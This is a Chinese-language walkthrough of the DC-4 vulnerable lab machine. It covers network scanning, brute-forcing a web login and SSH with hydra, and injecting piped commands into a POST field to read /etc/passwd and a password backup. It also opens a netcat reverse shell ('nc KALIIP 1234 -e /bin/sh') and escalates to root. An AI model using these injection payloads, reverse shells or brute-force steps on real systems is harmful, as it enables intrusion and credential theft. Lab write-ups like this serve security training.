靶机 DC-4

环境准备

DC-4靶机链接：百度网盘 请输入提取码

提取码：jq25

虚拟机网络链接模式：桥接模式

攻击机系统：kali linux 2021.1

信息搜集

1.查看存活主机，根据分析得出 192.168.166.133是DC-4靶机IP地址。

arp-scan -l

2.利用nmap扫描开放端口。

nmap -A- -p -T4 192.168.166.133

3.发现22端口和80端口开放。

尝试访问 192.168.166.133 得到一个登录系统。

漏洞利用

尝试爆破登录

爆破得到账号：admin ，密码：happy

登录后得到一个命令执行的界面

方法一：

1.这里抓包尝试一下是否能绕过，产生命令执行。

radio=ls+-l|pwd&submit=Run

2.抓包看到可以利用管道符进行命令拼接。

尝试查看/etc/passwd。

radio=ls+-l|cat+/etc/passwd&submit=Run

3.查看家目录下的用户。

radio=ls -alhR /home&submit=Run

4.可以看到在/home/jim/backups目录下存在文件old-passwords.bak，可能是密码的备份文件。

尝试查看备份文件。

radio=ls -al|cat+/home/jim/backups/old-passwords.bak&submit=Run

方法二：

1.直接执行命令，进行shell反弹

radio=nc+KALIIP+1234+-e+/bin/sh&submit=Run

nc -nlvp 1234 设置监听 反弹shell

查看home目录 发现有三个用户 把目录切换到jim 查看到三个文件 打开backups

发现一个密码文档 打开查看

既然我们获得了旧密码，也获得了账户。

其实都是一种方法只不过换了种形式来获取密码文档

权限提升

hydra爆破

hydra -L user.txt -P password.txt ssh://192.168.166.133 //-L,-P 都是大写
login:jim
password:jibril04

爆破成功

ssh登录

1.拿到用户名和密码直接登录ssh

2.用find查看可以利用的命令

3.把目录切换到mail 发现有一封邮件

4.发现了另外一个账户，并且文中有该账户的密码。

login:charles
password:^xHhA&hvim0y

5.teehee这个root用户不需要密码就能登录，直接拿flag,轻松拿下！！！